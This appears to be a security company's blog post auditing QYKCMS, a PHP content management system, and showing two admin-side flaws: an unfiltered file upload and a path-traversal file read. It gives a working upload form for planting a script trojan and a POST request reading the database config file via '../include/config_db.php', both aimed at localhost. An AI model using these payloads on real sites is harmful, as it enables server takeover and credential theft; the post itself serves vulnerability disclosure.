eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

QYKCMS網站安全檢測 任意文件讀取漏洞


           青雲客網站管理系統(QYKCMS)是青雲客開發的一款基於PHP+MySql架構的輕量級智

能建站系統。在T00ls看到兩篇QYKCMS的代碼審計文章,也下載了一套回來測試,發現了兩個

後台漏洞,並沒有跟前面的漏洞重複,分享一下網站安全檢測以及源代碼的安全審計思路。
 
 
網站漏洞代碼分析:
 
1、漏洞文件位置:/admin_system/include/lib/upfile.php   第24-69行:

 
這段代碼根據types的值進行操作,可以發現當$types=none的時候(注意看紅色代碼部分),

獲取文件名後綴,拼接成完整路徑,然後將文件上傳到主機,
並沒有對文件類型進行過濾,導

致程序在實現上存在任意文件上傳漏洞,攻擊者可以通過上傳腳本木馬,控制主機權限。esafe

安全公司是一家專注於:網站安全、主機安全、網站安全檢測、網站漏洞修復,滲透測試,安全

服務於一體的網絡安全服務提供商。
 
網站漏洞利用:
 
1、構造Form表單,key可通過XSS獲取管理員COOKIE得到:
 
1.  <form enctype="multipart/form-data" action="http://127.0.0.1/admin_system/api.php?admin=

    admin&key=15bc30cb5bfc1775c4733c9558fded91&log=upfile&types=none" method="post">  

 
2.  Upload a new file:<br>  
 
3.  <input type="file" name="file" size="50"><br>  
 
4.  <input type="submit" value="Upload">  
 
5.  </form>   
 
2、成功上傳腳本木馬,並回顯上傳路徑。
 
 
任意文件讀取漏洞詳情
 
網站代碼分析:
 
1、漏洞文件位置:/admin_system/include/show/template.php  第1-22行:


 
這段代碼中接收path參數,然後進行轉碼處理,注意看紅色代碼部分,接著判斷是否是一個目錄,

然後帶入file_get_contents函數中執行,可以看到path參數並未進行任何過濾或處理,導致程序

在實現上存在任意文件讀取漏洞,可以讀取網站任意文件,攻擊者可利用該漏洞獲取敏感信息。

eSafe白帽資安網公司是一家專注於:網站安全、主機安全、網站安全檢測、網站漏洞修復,滲透測試,安

全服務於一體的網絡安全服務提供商。
 
任意文件讀取漏洞利用:
 
QYKCMS默認數據庫配置文件存放在\include\config_db.php中,我們構造一個路徑去讀取數據庫敏

感信息,成功讀取配置文件信息。

 
http://127.0.0.1/admin_system/api.php  
 
POST: admin=admin&key=682b82f8dc3b753d6eb9ceafd5a64301&log=show&desc=template&path=../include/config_db.php  
 
分享: